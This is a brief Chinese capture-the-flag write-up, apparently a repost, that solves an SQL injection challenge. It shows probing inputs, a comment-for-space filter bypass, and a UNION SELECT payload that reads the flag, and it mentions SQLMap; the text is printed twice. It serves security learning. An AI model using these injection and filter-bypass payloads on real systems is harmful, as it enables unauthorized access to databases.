直接打开解题连接:
既然是SQL注入,那么我们就要构造注入语句了,这个就要有耐心一个一个去尝试了
输入语句
1'and 1=1 #
和
1'and/**/1=1/**/#后
对比一下,发现是过滤掉了空格,我们用/**/代替空格
下面就要构造找flag的语句了
1'/**/union/**/select/**/flag/**/from/**/flag#
最后就能找到flag了,(其实这里面还有一些步骤,用SQLMap跑啊跑~)
本文共 264 字,大约阅读时间需要 1 分钟。
直接打开解题连接:
既然是SQL注入,那么我们就要构造注入语句了,这个就要有耐心一个一个去尝试了
输入语句
1'and 1=1 #
和
1'and/**/1=1/**/#后
对比一下,发现是过滤掉了空格,我们用/**/代替空格
下面就要构造找flag的语句了
1'/**/union/**/select/**/flag/**/from/**/flag#
最后就能找到flag了,(其实这里面还有一些步骤,用SQLMap跑啊跑~)
转载于:https://www.cnblogs.com/Yuuki-/p/8268959.html